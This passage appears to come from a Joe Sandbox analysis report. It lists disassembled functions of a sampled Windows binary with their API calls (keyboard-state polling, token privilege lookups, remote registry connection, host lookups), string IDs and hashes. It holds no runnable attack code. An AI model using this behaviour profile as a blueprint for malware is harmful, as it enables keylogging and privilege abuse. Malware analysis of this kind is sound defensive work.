                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                            • String ID: 0.0.0.0
                                                                                                                            • API String ID: 2691793716-3771769585
                                                                                                                            • Opcode ID: 72edaa20f59d4c855ae2a4057bf2e912041bb0bcae33cfe0ba1e7234a9852c49
                                                                                                                            • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                                                                                                                            • Opcode Fuzzy Hash: 72edaa20f59d4c855ae2a4057bf2e912041bb0bcae33cfe0ba1e7234a9852c49
                                                                                                                            • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                                                                                                                            Function 00416B12 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                                                                                                                            • __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
                                                                                                                              • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                                                                                                                              • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
                                                                                                                            • GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
                                                                                                                            • __lock.LIBCMT ref: 00416B8A
                                                                                                                            • InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
                                                                                                                            • __lock.LIBCMT ref: 00416BAB
                                                                                                                            • ___addlocaleref.LIBCMT ref: 00416BC9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                            • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                            • API String ID: 1028249917-2843748187
                                                                                                                            • Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                                                                            • Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
                                                                                                                            • Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                                                                            • Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D
                                                                                                                            Function 0044920C Relevance: 18.2, APIs: 12, Instructions: 243windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
                                                                                                                            • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                                                                                                                            • CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
                                                                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                                                                                                                            • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                                                                                                                            • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$CharNext
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1350042424-0
                                                                                                                            • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                                                            • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                                                                                                                            • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                                                            • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                                                                                                                            Function 00453B94 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
                                                                                                                            • SetKeyboardState.USER32(?), ref: 00453C5A
                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00453C82
                                                                                                                            • GetKeyState.USER32(000000A0), ref: 00453C99
                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
                                                                                                                            • GetKeyState.USER32(000000A1), ref: 00453CDA
                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00453D07
                                                                                                                            • GetKeyState.USER32(00000011), ref: 00453D15
                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00453D3F
                                                                                                                            • GetKeyState.USER32(00000012), ref: 00453D4D
                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00453D77
                                                                                                                            • GetKeyState.USER32(0000005B), ref: 00453D85
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 541375521-0
                                                                                                                            • Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                                                            • Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
                                                                                                                            • Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                                                            • Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
                                                                                                                            Function 00437DB1 Relevance: 18.2, APIs: 12, Instructions: 180COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00437DD7
                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00437DE9
                                                                                                                            • MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00437E70
                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00437E82
                                                                                                                            • MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00437EEA
                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00437EFC
                                                                                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00437F55
                                                                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3096461208-0
                                                                                                                            • Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                                                                            • Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
                                                                                                                            • Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                                                                            • Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95
                                                                                                                            Function 00436879 Relevance: 18.1, APIs: 12, Instructions: 115COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 136442275-0
                                                                                                                            • Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                                                                            • Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
                                                                                                                            • Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                                                                            • Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
                                                                                                                            Function 0046B39A Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 401registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConnectRegistry_wcslen
                                                                                                                            • String ID: HH
                                                                                                                            • API String ID: 535477410-2761332787
                                                                                                                            • Opcode ID: e2a7fb052978a91ecbf92423e9c711e8fd026b8448a895789e5cd97d1a81579d
                                                                                                                            • Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
                                                                                                                            • Opcode Fuzzy Hash: e2a7fb052978a91ecbf92423e9c711e8fd026b8448a895789e5cd97d1a81579d
                                                                                                                            • Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
                                                                                                                            Function 00460473 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                                                                                                                            • _wcslen.LIBCMT ref: 00460502
                                                                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004606AD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
                                                                                                                            • String ID: ThumbnailClass
                                                                                                                            • API String ID: 4123061591-1241985126
                                                                                                                            • Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                                                            • Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
                                                                                                                            • Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                                                            • Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
                                                                                                                            Function 0046F50B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 157windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                                                              • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                                                              • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                                                              • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                                                            • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                                                                                                                            • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
                                                                                                                            • ImageList_EndDrag.COMCTL32 ref: 0046F583
                                                                                                                            • ReleaseCapture.USER32 ref: 0046F589
                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 0046F620
                                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
                                                                                                                            • API String ID: 2483343779-2060113733
                                                                                                                            • Opcode ID: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                                                                                                                            • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                                                                                                                            • Opcode Fuzzy Hash: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                                                                                                                            • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
                                                                                                                            Function 0046FD7F Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 143windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                                                                                                                            • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                                                                                                                            • GetClientRect.USER32(?,?), ref: 0046FEF2
                                                                                                                            • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                                                                                                                            • DestroyIcon.USER32(?), ref: 0046FFCC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                                            • String ID: 2
                                                                                                                            • API String ID: 1331449709-450215437
                                                                                                                            • Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                                                            • Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
                                                                                                                            • Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                                                            • Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
                                                                                                                            Function 00450E7D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?,?,00000000,static,00000000,00000000,?,?,00000000,00000000,?,00000000), ref: 00450EE1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DestroyWindow
                                                                                                                            • String ID: static
                                                                                                                            • API String ID: 3375834691-2160076837
                                                                                                                            • Opcode ID: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                                                                            • Instruction ID: 4605c95b1b006c90d65e271c0fdf07f62d21d56273c2870bf7f2e3decf5281c5
                                                                                                                            • Opcode Fuzzy Hash: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                                                                            • Instruction Fuzzy Hash: 4531B572200300BBD7109B64DC45F6BB3A8EBC9711F204A2EFA50D72C0D7B4E8048B69
                                                                                                                            Function 004393E2 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 109threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                                                                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                                                                                                                            • _memcmp.LIBCMT ref: 004394A9
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
                                                                                                                            Strings
                                                                                                                            • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                                                                                                                            • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                                                                                                            • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                                                                            • API String ID: 1446985595-805462909
                                                                                                                            • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                            • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                                                                                                            • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                            • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                                                                                                            Function 0045D83D Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 86COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                                                                                                            • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                                                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode$DriveType
                                                                                                                            • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                                                                                                            • API String ID: 2907320926-41864084
                                                                                                                            • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                                                            • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                                                                                                                            • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                                                            • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
                                                                                                                            Function 00467214 Relevance: 16.8, APIs: 11, Instructions: 313COMMON
                                                                                                                            Download Yara Rule
